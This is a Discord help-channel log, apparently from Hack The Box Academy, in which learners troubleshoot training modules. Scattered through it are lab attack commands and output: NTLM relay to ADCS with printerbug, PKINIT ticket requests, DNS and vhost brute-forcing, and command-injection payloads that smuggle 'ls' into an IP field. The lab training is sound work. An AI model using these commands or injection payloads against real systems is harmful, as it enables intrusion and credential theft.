#modules

1 messages · Page 451 of 1

livid zephyr
#

Module:Shells & Payloads; Task:The Live Engagement. I am using the Parrot machine provided, but it keeps failing to access the website (port 80 and port 8080). I keep getting the connection has time out issue. This is for Host-1 from the Footholding machine. I tried using Chrome and Firefox. Trying to investigate the issue seems to get the "connection to this site is not secure". I remember a while ago that some browsers were going to block connections to sites that are not using encryption(https). Could this be the issue?. I can't complete this assignment if I can't access the website.

rose lagoon
#

|| Yes I tried dc1 and dc2 but I have nothing ||

quiet heart
#

The answer is inside the picture + delete it 😄

surreal goblet
#

its not worknigsadglas

#

i get it a long back

quiet heart
surreal goblet
#

ok wait

#

thank you

#

i hate my self

#

goti

quiet heart
rose lagoon
#

I re tried everythings but still don't find it

waxen totem
#

y'know if you gonna use spoiler tags might as well take it to DMs

rose lagoon
#

|| when I'm brute forcing w ""for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done "" It only shows me 3 sub ||

#

@quiet heart || I tried this for sub in $(cat /opt/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.dev.inlanefreight.htb @10.129.92.82 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||

median kettle
#

I also tried resetting the vm several times. Still the same result. My printerbug.py doesn't wanna work when I point it to my target.

digital pendant
#

<@&861185840277487616> looks like the copy pasta has arrived in most of the channels.

civic niche
#

In Password Attacks – PtT from Windows the task is to use John’s TGT to perform a Pass-the-Ticket attack and retrieve the flag from \DC01.inlanefreight.htb\john. After several resets I only find john.txt (which is the answer to the next question) and Julio.txt in the Julio folder (not accepted). Where is the flag for the question: “Use John’s TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john”?

tidal basin
#

I'm assuming a connection issue/vpn config is getting me in the
information gathering > DNS zonetransfer
academy question set.

dig axfr @nsztm1.digi.ninja zonetransfer.me
works great

dig axfr @ns1.inlanefreight.com zonetransfer.me
fails
connection to [TargetDNS.IPADDRESS]:53 failed timedout

Using the openvpn file given in the lab. tried on parrot and home lab kali box.

What am I missing please and thank you

fathom pendant
fiery light
#

I'm having issues with the Password Attacks, Pass the Certificate admin question. I've seen posts here about how the tool in the section doesn't work for the adcs attack anymore as PKCS12 is deprecated and have been trying workarounds but none have yet to work. Does anyone have a simple workaround i can implement?

rotund scarab
#

Hi, i need some help on the infogathering web edition module, vhost section. Im trying to brute force but no tool or command seems to work or give any output. Am i missing something?

fathom pendant
quiet heart
fathom pendant
rotund scarab
#

No 😬

rotund scarab
#

I used both gobuster and ffuf but i guess my main problem was not editing the hosts file

fiery light
quiet heart
fathom pendant
#

With ffuf you need the -H "FUZZ.inlanefreight.htb"

#

And the url can either be inlanefreight.htb or the spawned ip

rotund scarab
rotund scarab
fathom pendant
fiery light
#

] Servers started, waiting for connections
[
] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[] HTTP server returned error code 200, treating as a successful login
[
] Authenticating against http://10.129.95.150 as INLANEFREIGHT/DC01$ SUCCEED
[] Generating CSR...
[
] CSR generated!
[] Getting certificate...
[
] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.178.63, attacking target http://10.129.95.150
[-] Authenticating against http://10.129.95.150 as / FAILED
[*] GOT CERTIFICATE! ID 13
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in getattr
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'

#

Not the error in the reading

#

commands: impacket-ntlmrelayx -t http://10.129.95.150/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication, (kali㉿kali)-[~/Tools]
└─$ printerbug INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.178.63 10.10.15.166
[*] Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[] Attempting to trigger authentication via rprn RPC at 10.129.178.63
[
] Bind OK
[] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[
] Triggered RPC backconnect, this may or may not have worked

#

Error is the openssl PKCS12 being deprecated since the module was written

rotund scarab
quiet heart
rotund scarab
silk lagoon
#

You’re missing -H

fiery light
#

@fathom pendant any ideas?

quiet heart
fathom pendant
#

i believe the oscrypto fix should also fix the pyopenssl issue

rotund scarab
rotund scarab
#

Finally it worked
Thanks @quiet heart & @fathom pendant

calm lintel
#

Hey guys im rrom Czechia And in my life i can't find where to download the wpn config file to use shh can someone help me?

fathom pendant
#

@rose lagoon don't provide direct solutions, keep that to dms (if requested)

fiery light
# fathom pendant i believe the oscrypto fix should also fix the pyopenssl issue

installed oscrypto and get this: ─$ python3 gettgtpkinit.py -cert-pfx DC01$.pfx -dc-ip 10.129.234.174 'INLANEFREIGHT.LOCAL/dc01$' /tmp/dc.ccache
2025-09-12 15:50:19,989 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 349, in <module>
main()
~~~~^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
~~~~~^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 302, in amain
ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 49, in from_pfx
return myPKINIT.from_pfx_data(pfxdata, pfxpass, dh_params)
~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Tools/PKINITtools/gettgtpkinit.py", line 58, in from_pfx_data
privkey, cert, extra_certs = pkcs12.load_key_and_certificates(pfxdata, None)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^
ValueError: Invalid password or PKCS12 data

rose lagoon
fossil sequoia
#

Hello
hello i have a problem on the Active Directory Enumeration & Attacks
can you help me ?

quiet heart
fathom pendant
fossil sequoia
quiet heart
fossil sequoia
#

on the DCSync part

rose lagoon
#

@quiet heart I tried what you said me but I don't find the sub in the footprint DNS

fossil sequoia
#

the rdp connection always failed

fossil sequoia
quiet heart
fossil sequoia
quiet heart
rain mirage
#

module : PASSWORD ATTACKS
Credential Hunting in Network Traffic
Question :The packet capture contains cleartext credit card information. What is the number that was transmitted?

i cant figure this out i tried the Pcredz , and tryed going through the wireshark as well but no luck

quiet heart
cosmic patrol
#

The skill assessment is not broken, you juste have to do SQLi when you want to check the price

#

@swift dove please have you already finished the part of attacking the system? I’m stuck.

frozen yew
#

Yo

#

What fo yall think of the ALHacking tool

cloud urchin
digital pendant
#

how do you guys run python2.7 ? I can't seem to find many simple tutorials on getting that to work. Despite that in modules there are exploits that drupalgeddon that require it so would be nice to practice

cloud urchin
#

python2.7

digital pendant
#

yes I know the command I mean its not installed on pwnbox and not installed on my home lab,

digital pendant
#

has no installation candidate 😄 pwnbox...

#

Can't exploit if I don't have EOL python versions ... mhm painful

quiet heart
rough ruin
#

hi guys i am stuck in a footprintg module in the SNMP section. The last question to enumerate a custom script i dont have any clue.

digital pendant
stuck hollow
#

anyone?

quiet heart
rough ruin
#

yes

main ridge
#

Hi. I'm having an issue with the identifier bot command. It says I should contact an Administrator or Moderator. Which channel is the right one to do this?

quiet heart
# rough ruin yes

Run the same command, then search for the flag manually or using grep

rough ruin
#

@quiet heart but what i should look?

fathom pendant
main ridge
fathom pendant
#

gotchu

#

next time direct message a mod/admin

#

instead of posting randomly in one of the channels

#

because it can easily get buried

main ridge
#

I have to contact someone else?

fathom pendant
#

and that was weeks ago, where i can assume that if i wasn't busy or that you contacted someone else and got it resolved

quiet heart
fathom pendant
#

@main ridge should be good now

rough ruin
#

@quiet heart i found but it's not working

quiet heart
rough ruin
#

no space. but i have to run the .sh file or i need just the path?

quiet heart
rough ruin
#

@quiet heart thanks solved!

cloud urchin
#

@charred ice Please do not post flags

charred ice
tight kraken
# charred ice I spoilered it. It wasn't even correct ig

Not to be rude, but it appeared fully visible to me and was only one character off. Best to avoid posting flags in any form and follow moderator direction. Regarding the exercise-- you're on the right track and very close to the answer, just double-check what character you missed when stitching it together. The correct format includes the usual HTB{...}.

cloud urchin
#

@charred ice Do not post flags. Spoiler tag does nothing.

charred ice
cloud urchin
#

You did

#

no need to post flags or content from modules above tier0. just ask your question, anyone who has done the module can help without needing that additional info as they've seen it

charred ice
#

What am I doing wrong here? Like I did split the string as it said. I can't understand how or why should I take HTB{} into account and why in general is wrong here

cloud urchin
#

you never said which section you're on so it's hard to say

#

always include the module, section, and question

#

my guess is you're finding another flag entirely, or just not inputting it correctly

cloud urchin
#

You've only done part of it. You need to unpack it as well.

charred ice
frozen yew
#

Yo i need a hacker

#

To ask a question

#

Just how to fill smth

storm elk
#

What about @frozen yew

quiet heart
frozen yew
#

Its for instagram

#

Just dont understand some of this stuff

#

I can send a pic in dms

cloud urchin
storm elk
#

Hacking instagram is illegal

frozen yew
#

Im not gonna hack

#

Just asking

cloud urchin
#

Reach out to Instagram support if you need help

#

you're welcome

frozen yew
#

A hacking discord server that doesnt do hacking

#

Wow

cloud urchin
frozen yew
#

Why didnt u name it that insted of hacking

cloud urchin
#

It is named HackTheBox...

#

but that's enough of this, stay on topic. this channel is for discussion of the modules, no one here is going to help you with illegal shit.

quiet heart
frozen yew
#

Whats a htb account

compact patrolBOT
terse bloom
#

Hello, Using Web Proxies --> Zap Scanner. ZAP doesn't show any critical RCEs or anything as it says it should in the module task

median kettle
#

has anyone came across this error in the pass the certificate attack module?

#

i put the IP twice because if i dont impacket wont know the target.

icy gulch
#

hey, can someone give me a nudge in Windows Privilege Escalation(Miscellaneous Techniques)? i cant find anything, even after running winpeas - maybe im just missin it

heavy mango
median kettle
#

@heavy mango

heavy mango
median kettle
#

yes. i have it, along with Jpinkmans

heavy mango
median kettle
#

@heavy mango i am using the second one after i saw my mistake

heavy mango
median kettle
#

@heavy mango

#

yes

#

i figured it out. thank you @heavy mango

heavy mango
#

What was it?

median kettle
#

the CA ip was used instead of the DC i[

#

instead of the dc ip

icy egret
#

hello everyone, anyone knows how to do file upload attacks? i am stuck with blacklist filter, i dont really know where i am doing wrong

long remnant
#

I'm new in this, what do you recommend me to start programming and hacking, thank you

compact patrolBOT
zealous hearth
#

Hi guys, I’m going through the course. I’m at file upload attacks, whitelists. I’m having issues getting the php scrip to execute. I was able to upload it in several different ways, but I can’t get it to run. I got 404s, blank screens and a error complaining about the picture has errors

silk lagoon
quiet heart
quiet heart
zealous hearth
#

A nudge would be appreciated

#

I can’t get the code to execute at all

quiet heart
icy gulch
quiet heart
zealous hearth
cloud urchin
#

@little shadow Please do not reveal content from modules above tier 0.

little shadow
cloud urchin
#

I'm busy sorry

wooden fiber
#

Hello, I am doing the skill assessment on Web Fuzzing, but I don't know if I am doing something wrong or don't know in which format I should input the answer. The formulation is a bit confusing. It says:

What are all the sub-domains you can identify? (Only write the sub-domain name)

I did found multiple sub-domains, but which should be format for multiple answers? I tried x, y,z and x y z and just x or just but it doesn't seem to be valid. So, at this point I don't know what is wrong? I also tried http://x.domain , x.domain just x, and other variations

fathom pendant
#

so like

www dev admin
wooden fiber
#

Oh, yes it worked. It would be helpful to have an example in there like other modules have. Thank you!

fathom pendant
wooden fiber
#

So I assume for extensions is the same format, but should it include . or not?

wild verge
#

I can't get the curl command to work on https://www.inlanefreight.com as part of one of the Linux fundamentals questions. I'm not looking for help in answering the question just help on why curl doesn't work. I made sure I was using the Pwnbox instance and not still ssh into the target machine so I must be missing something

wild verge
#

yes

fathom pendant
#

That's why, if youre on a free account pwnbox has a lot of limitations

#

You can buy $5 worth of cubes to remove the restrictions (or use your own vm)

wild verge
#

oh but it says too but I guess it doesn't mention anything about what style account works

#

I see, ok thank you!

fathom pendant
#

Its just a restriction on free accounts

#

(Aka you spend $0)

#

But spending any amount of money on academy lifts pretty much all the pwnbox restrictions

silk lagoon
#

Can I please get a pm for XPath - Blind Exploitation (CWEE)

neat compass
#

Hi

night shale
#

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

golden halo
#

I see the mistake I was making, thank you!

fossil sequoia
#

hello i have a little prob in the course in the Active Directory Enumeration & Attacks exactly on the privileged access section

stable flume
#

Anyone can give me a nudge for password attacks skill assessments, || i've manage to found .pcap files inside ** shares, i've tried to extract the hash with john tools (pcap2john, wpapcap2john and any pcap related) none of them works either showing illegal instruction, not supported, or file has wrong size, also am i even in the right path?||

stable flume
fossil sequoia
#

With the htb-student:Academy_student_AD!

#

It returns

#

Permission denied

eager spindle
fossil sequoia
#

Nah the attacker machine is a linux os not windows

wary wren
#

hey can anyone help me in using crackmapexec modulle + 0 Use the service account you found to access the shared folder serviceaccount and read the flag. I can't seem to connect

night shale
#

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

rain mirage
#

module : password attack , Credential Hunting in Network Shares

One of the shares mendres has access to contains valid credentials of another domain user. What is their password?

i tryed but the op of the tool Snaffler is too massive ,

merry stone
#

which section?

eager spindle
zinc pumice
#

Module: Pivoting, Tunneling, and Port Forwarding

I am trying to perform a full TCP connect scan with Nmap after setting up dynamic port forwarding on port 9050.
I'm not getting the expected results, but I am able to connect via RDP.
Is there something wrong with my procedure or the command? Can someone help me?

civic inlet
#

is there a process if someone can contribute to htb academy?

cloud urchin
#

Yeah if you get hired at HTB

civic inlet
#

😭

hasty mauve
night shale
#

guys i need help with footprinting

What is the FQDN of the host where the last octet ends with "x.x.x.203"?

on the DNS part

onyx scroll
#

Hi there, im currently in this module "password attacks", and im trying to solve: Mount the BitLocker-encrypted VHD and enter the contents of flag.txt as your answer.

the thing is, when i try to mount the .vhd file, it doesnt create the /dev/loop0p2 partition

#

dont know how to solve it, i did some research and i saw that the minimun file size is 64MB, which makes me think the file is not to blame here

white shuttle
#

How do I send msgs in general😭😭

onyx scroll
cloud urchin
white shuttle
#

Oof

sudden hazel
#

Hey all, I'm currently on Network Foundations module - Skills Assessment. I'm trying to follow the optional task called "Target Acquired".
Now the issue I get is when I'm connected to the FTP and in passive mode, and calculated the port number, I get "connection refused" error message instead of "open".
I followed the task to the letter, so I'm a bit confused what did I do wrong. Can anyone please help?

white shuttle
#

Is there a hacker that could help me? 😛

cloud urchin
white shuttle
#

It Isnt😭

cloud urchin
#

Then no

white shuttle
#

I can't seem to

cloud urchin
#

Nope, this server isn't for that. Reach out to support on the website.

white shuttle
#

I tried to

quiet halo
#

Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

#

i found ns.inlanefreight.htb and root.inlanefreight.htb

#

the answer is ns.inlanefreight.htb, why is it not root.inlanefreight.htb?

#

they both look like FQDNs to me

stone zephyr
#

Anyone have experience with an error when trying to spawn target "Error - not enough permissions to create a genesis"

sudden hazel
# sudden hazel Hey all, I'm currently on Network Foundations module - Skills Assessment. I'm tr...

found the solution (Claude to the rescue :D)

What you need to do:

Keep your first terminal open with the FTP control connection (the one where you ran nc 10.129.233.197 21)
Before connecting to the data port, you need to send a command that requires data transfer. The most common one is LIST to list directory contents.

Here's the correct sequence:
In your first terminal (control connection):
USER anonymous^M
PASS anything^M
PASV^M
(You've done this part correctly)
Immediately after getting the PASV response, send:
LIST^M
Then quickly, in your second terminal:
nc -v 10.129.233.197 49674
The key points are:

The data port is only opened when the server expects a data transfer
You have a limited time window to connect after sending the LIST command
The connection to the data port should happen almost immediately after sending LIST

drifting sand
#

Hi,everyone. I want to know why in HTB lab I completed the task 1 .suppose the task 2 will be unlock but I completed task 1 and submitted the task 2 is still lock?why?

drifting sand
#

Just the Tier 0 ,Meow lab

dense compass
night shale
proven plinth
atomic crest
#

Can anyone help me with Ai red teaming ctf going on live. I am struggling with last challenge

acoustic owl
atomic crest
#

Okayy

cosmic patrol
lapis whale
#

Is there a way to cancel and re try the target spawn?
I think mine got stuck, it has been 5 minutes and still spawning

storm elk
#

Sometimes changing regions can help @lapis whale or just waiting

lapis whale
#

Seems to have kicked up now :D, thanks for the prompt response though 😉

storm elk
#

Some just take a while to fully spawn

viscid tulip
#

Hello guys im new here and i wanna be professional in network what do u suggest and what should i do in this server ?

icy egret
icy egret
acoustic owl
#

try dig dc1.internal.inlanefreight.htb @ip

bright coral
#

When you directly query the A (or any other record) the server answers based on the allow-query option. In your example it makes sense to prevent lookups from an external endpoint to an internal subdomain. The axfr answer is based on the allow-transfer option and is obviously misconfigured here. Both default to any client.

#

you forgot the @ in front of the IP and now get NXDOMAIN instead of REFUSED

brave field
orchid scaffold
#

hello i want to remove my billing options but i cannot as i forgot my old paypal creds can you remove it for me? if you can i have to do it today if possible

sacred rock
#

Don't tag staff like that. You need to contact support.

compact patrolBOT
orchid scaffold
#

i have to do it today

quiet halo
#

when you guys go through the modules, do you ya'll take extensive notes on the technical stuff or just on the commands with a short description?

civic inlet
#

Hello im trying to do advanced SQL injection skills assessment but I can't even get the source code, I keep getting access denied??

scp -r student@10.129.162.182:/opt/Pass2-1.0.3-SNAPSHOT.jar ./
The authenticity of host '10.129.162.182 (10.129.162.182)' can't be established.
ED25519 key fingerprint is SHA256:0RhCtT2MFrH2W8dgUHOrUktMt33E3zeFyi+wZVYPqNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.162.182' (ED25519) to the list of known hosts.
student@10.129.162.182's password: academy.hackthebox.com
Permission denied, please try again.

can anyone help?

jovial vine
#

Hello, where can I ask for help/advice on HTB Labs?

waxen totem
silk anchor
#

~~Anyone that can help on DACL II Skills assessment Q3?

I know what I need to do, but I am getting skilled issued trying to execute it.~~

Nvm dug myself out

acoustic owl
#

You forgot the @

fossil sequoia
#

Gm what are the ssh creds of ACADEMY-EA-ATTACK01 on the Active Directory Enumeration & Attacks

brave field
#

Haven't done this module, but aren't you supposed to provide a username and password with Powershell, and for that we need to create a PSCredential object

hasty mauve
rustic sage
#

Hello dose anybody know how to hack I need help with a situation im in

finite scaffold
#

Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercice :
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )

fossil sequoia
#

Guys who can help me on Active Directory Enumeration & Attacks

#

Exactly what are the creds if the ssh session of the attacker vm

#

I tried htb-student:Academy_student_AD!

#

Nd it didn’t work

fossil sequoia
#

Exactly the sql server part

quiet heart
fossil sequoia
#

what are the creds of this vm

hasty mauve
# fossil sequoia what are the creds of this vm

HTB does this from time to time.
You can probably find his credentials in the lesson itself.
Sometimes they mention the credentials once and re-use it across other sections within the same module.

quiet heart
fossil sequoia
#

thanks @quiet heart

quiet heart
glad finch
#

Does anybody know if the AI Red Teamer Path will get a certification? It's been a while since I see it on the 'Job Role Paths' but still no cert

shell pewter
#

Hi guys, can anyone give me a hand in:
INJECTION ATTACKS, XPath - Blind Exploitation

I was able to find the users, but the password returns none

dull solar
#

Can I take the "Hacking Wordpress" module or is it being phased out due to the transition from CBBH --> CWES

#

I don't want to go halfway through something and it get yeeted.

acoustic owl
#

The module will remain in the Academy. If I remember correctly, it is in the CJCA path.

gusty zinc
#

Hello - I'm having issues with the CRACKMAPEXEC module 84 section 1747 (Skills assessment)

I am connected via chisel - but no matter what I try I cannot get any connection to the internal host to enumerate users. The question is: " What's the password of the account you found?"

It looks to be connection issue related - i cant scan the machine at all.

dull solar
#

Type the command you used so it can be corrected

#

Have you tried visiting the site in your browser.

#

Add the IP of inlanefreight/the target to your /etc/hosts?

#

Otherwise curl it by its IP.

#

Np

gusty zinc
gusty zinc
haughty fiber
#

Web Proxies Skill Assessment 2nd question. I used CyberChef to get the value but how would one find which encoding was used manually

silk lagoon
#

Can I please get a pm for XPath - Blind Exploitation (CWEE)

digital pendant
#

you guys getting VPN issues ? got a DNS style output in my openvpn window. Might change vpns

#

seem to be getting the same on EU-VPN 5. Mhm can't connect to labs atm, something going on ?

#

Seems that my VM was just having a paddy. All good now

rare mirage
#

Can someone please help me? I was doing the Windows Command Line Introduction Module skill assessment and the task is "Access the host as user1 and read the contents of the file "flag.txt" located on the user's desktop." But when I try to connect via RDP (using this command: xfreerdp /v:10.129.153.38 /u:user1 /p:'.........') I get this error:
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:47:46:128] [13699:13700] [WARN][com.freerdp.crypto] - CN = ACADEMY-ICL11.greenhorn.corp
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:46:430] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[14:47:47:177] [13699:13700] [ERROR][com.freerdp.core] - freerdp_post_connect failed
And I don't know how to solve it

digital pendant
#

@rare mirage careful not to spoil content of modules above Tier 0

#

they dont like that...

digital pendant
rare mirage
digital pendant
#

All good, use the password you had in that message above (see you censored it now :)) in the ssh connection and you should be able to get the flag from there

digital pendant
heavy grove
#

Hey, maybe I'm just stupid, but in the skills assessment in the hacking WordPress module, the target IP is simply not a WordPress website. It's probably just me, but I'm stuck. The previous part of the module went perfectly. Can anybody help me?

digital pendant
digital pendant
dull solar
brazen saffron
#

You can use fuff or gobuster to find some vhost (or other tools), just need a wordlist, from SecLists for example, and the URL of the target.
To popularize what a vhost is, it is a subdomain.

digital pendant
# dull solar So why aren't they reachable normally via DNS resolver instead of having to add ...

vHosts are subdomains that when put into hosts file you're able to resolve, without it you're sent to the IP of the site which may not be hosting the website or even the remote DNS server may not have a record of the domain, the benefit of vhosts is they allow you to host multiple apps off of one host / sharing the resources of the server. So putting into /etc/hosts you'll be able to resolve the domain locally by specifying the IP it can be reached at.

I'm sure others will have better descriptions but thats my understanding

#

gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q --append-domain this command saved my butt a few times going through the modules towards end of CPTS. vHost enumeration (after placing the lab ip into the /etc/hosts with inlanefreight.local)

sand rose
#

Hello guys, in the documentation and reporting module, and for the second question in the "Notetaking and Organization" section, basically asking how to do a vertical pane split in tmux, I'm having an issue with the formatting of the answer. I don't want to post the answer here since its a tier 2. I just need help with the formatting if someone is able to help.

Thank you!

quiet heart
devout lily
#

Can someone explain me the usage of rpcclient $> enumdomains?

safe star
devout lily
safe star
devout lily
#

I dont know what Active Directory is

safe star
#

if theres no AD then it will probably be enumerating the workgroups

devout lily
#

this is the example in the section

safe star
fathom pendant
#

Builtin refers to the "Builtin" or native stuff

somber whale
#

I have a question: If you go through the Academy. Can you learn how to go through CTF ? A complete beginner. Basically, I’m just curious if it’s worth going through the Academy and all other modules be enough for a beginner to be able to compete in CTF?

fathom pendant
#

The skills gained in academy go beyond ctf skills, but yeah uou can use them in ctfs

hollow geyser
#

Module Name: Linux Fundamentals
Section Name: Filter Contents
Question: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

My current attempt does look like this: curl -Ls https://www.inlanefreight.com | grep 'https://www.inlanefreight.com' | sort -u | grep -o '/' | wc -l

I have no idea how to count all unique paths. I appreciate any help...

cloud urchin
#

Your attacker box can't reach the Internet. Weird it's trying over IPv6.

hollow geyser
#

Have you fixed your networking issue? 😄

somber whale
fathom pendant
#

yeah

somber whale
#

Thank you

cosmic patrol
#

hey please I have problem with the flag in model deployment tampering. Were you able to read having the flag?

for me i have
{
"code": 500,
"type": "InvalidWorkflowException",
"message": "Failed to parse yaml."
}

rare mirage
#

Can someone help me? I'm in the Windows command line module skill assessment and I'm in task 10 where the objective is to find the user with the most failed logon attempts and I can't find him. I'm using this code and it's still failing.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4625} | Group-Object {$_.Properties[5].value} | Select-Object Count,Name | Sort-Object Count -Descending

somber whale
#

I think you need to use the command Up Down Up Down Left Right Left Right A B Select Start

normal vigil
#

I got some questions and i need help if someone really advanced can help me lmk.
(only really advanced people tho)

cloud urchin
little thunder
#

@patent remnant

cloud urchin
#

Please don't just randomly ping people

flat crown
#

Hey guys ,I'm new to hack the box and i would like to learn , can sombody tell me what should i do beacause im like 0% in this and i hope i get good advices👍

acoustic owl
#

Hi

Check out this blog post. Here you can learn the first steps.

compact patrolBOT
steady onyx
#

Should I do CJCA or SOC path first if I already graduated college and have a begginer-intermediate knowledge

cloud urchin
#

SOC path

#

CJCA is a beginner cert, CDSA is intermediate

steady onyx
#

Cause I’ve done CTFS already and did like Tryhackme and wanna level up

unique field
#

hi @fathom pendant on migration to CWES cert does the modules we have now on the list due to change? or what ?

fathom pendant
eager spindle
#

hello,every.I need help about module Active Directory Enumeration & Attacks at section AD Enumeration & Attacks - Skills Assessment Part II,question:Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.I tansfer ||juicypotato|| to SQL01 via ||xp_cmdshell|| and i use command ||xp_cmdshell C:\Temp\JuicyPotato.exe -l 18000 -p C:\Temp\shell.exe -t * -c return|| COM -> recv failed with error: 10038,I also try other CLSID,it still return same result.please give me some suggestions

finally, I use printspoof to get system

digital pendant
#

you can DM me @eager spindle if a nudge is needed

median gale
#

Windows Lateral Movement, SA, Question 5, how do we get connectivity from the WSUS server back to attack host to upload files ? Solution downloads the files from the external IP of attacker machine but clearly that cant be since the WSUS server doesnt have a network interface with an external IP. Ligolo listener also doesnt work cause firewall is blocking unused connections as stated, so whats left ?

finite scaffold
#

Module: Command injection
Section: Bypassing Other Blacklisted Characters
The exercice :
i have completed it with a different way but couldn't do it the way they said ( using semicolon instead of new line %0a)
My payload : ip=127.0.0.1$(tr${IFS}'!-}'${IFS}'"-~'<<<:)ls (Trying to bypass semicolon restriction)
using the same technique on a command works fine like
ip=127.0.0.1%0a$(tr${IFS}"[0-x]"${IFS}"[2-z]"<<<j)s (execute ls )

vale crescent
#

Hey im stuck at the first assessment in linux privilege escalation how can i get the flag ive enumerate every file but i couldnt get it

rustic sage
#

Do staff always do the cube talk every Fridays at 12AM EST?

opal shuttle
icy marsh
#

Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?

sand rose
icy gulch
#

hey, can someone give me a hint in Windows Privilege Escalation Skills Assessment - Part I for the second question - Find the password for the ldapadmin account somewhere on the system.?
im already nt authority\system btw

grim cipher
#

.

real salmon
#

in modul Xss , section phishing the send.php not response and get message "issus in url vailed" what is the problem

#

any one geting any error or so wiste time in response ??

formal briar
#

Hi I have a simple question. How can I share my progress with my student id ? Do we have like an API's URL ?

glacial minnow
#

hello! I'm currently doing the AEN module and i have a few questions about reporting specifically in the exploited hosts appendix. my question is, when writing an entry in the appendix do you include even the hosts not used in the exploit chain to full domain compromise? for example if an exploit led to an RCE on a host not in scope, would you still add it to the appendix? or is it intended for all and every exploit you find?

#

this image is taken from a sample report hosted by htb.

quiet heart
#

<@&861185840277487616>

fathom pendant
glacial minnow
#

are you sure?

digital pendant
#

Which module did you take the sample from ?

fathom pendant
#

but to answer: exploited host just means any host you exploited

#

doesn't necessarily mean the chain. Exploited hosts won't necessarily have to appear in your detailed attack chain

glacial minnow
#

BTW, Should I list only the hosts where I actually gained a foothold or full compromise, and exclude web vulnerabilities that didn’t let me get a foothold?

potent brook
#

Hi all,

I am currently stuck on the LLM Output Attacks Skill Assessment. I managed to obtain two sets of keys from Imagebot, but they don’t seem to have much use. None of my injection attempts have worked so far, and most of them are blocked. Additionally, I was able to change my logged-in user role, but still no luck. Any hints? Thanks!

potent brook
#

Hey. I am currently stuck. Can I DM you?

swift dove
spring root
#

In Active Directory LDAP - Skills Assessment the last question is "What non-default privilege does the htb-student user have?" whoami /priv doesn't return the right answer. Any hints?

keen canopy
#

In the traditional WPA password attack when i execute sudo airmon-ng start wlan0 it says wlan0 not found i am completely new to this and dont wanna seem dumb

rotund flare
#

Hello everyone I’m new here

fathom pendant
keen canopy
#

wifi password cracking techniques

fathom pendant
#

@rotund flare welcome, i suggest reading #welcome to see what the server is about and to see how to gain access to chat in #general.

fathom pendant
keen canopy
fathom pendant
#

"launch instance" spawns the in-browser vm, that doesn't connect you to the target

keen canopy
#

so what do i have to do because ive read the first fundamental module but i still dont understand

